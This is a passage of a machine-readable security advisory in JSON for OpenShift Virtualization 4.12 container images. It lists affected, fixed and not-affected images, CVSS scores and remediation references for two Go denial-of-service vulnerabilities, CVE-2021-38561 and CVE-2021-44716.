"container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64" }, "product_reference": "container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "relates_to_product_reference": "8Base-CNV-4.12" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64 as a component of CNV 4.12 for RHEL 8", "product_id": "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" }, "product_reference": "container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", "relates_to_product_reference": "8Base-CNV-4.12" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-38561", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2022-06-23T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2100495" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang\u0027s library. The overall DoS attack vector depends directly on how the library\u0027s input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-38561" }, { "category": "external", "summary": "RHBZ#2100495", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-38561", "url": "https://www.cve.org/CVERecord?id=CVE-2021-38561" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561" }, { "category": "external", "summary": "https://pkg.go.dev/vuln/GO-2021-0113", "url": "https://pkg.go.dev/vuln/GO-2021-0113" } ], "release_date": "2021-08-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS" }, { "cve": "CVE-2021-44716", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-09T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030801" } ], "notes": [ { "category": "description", "text": "There\u0027s an uncontrolled resource consumption flaw in golang\u0027s net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http\u0027s http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: net/http: limit growth of header canonicalization cache", "title": "Vulnerability summary" }, { "category": "other", "text": "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", 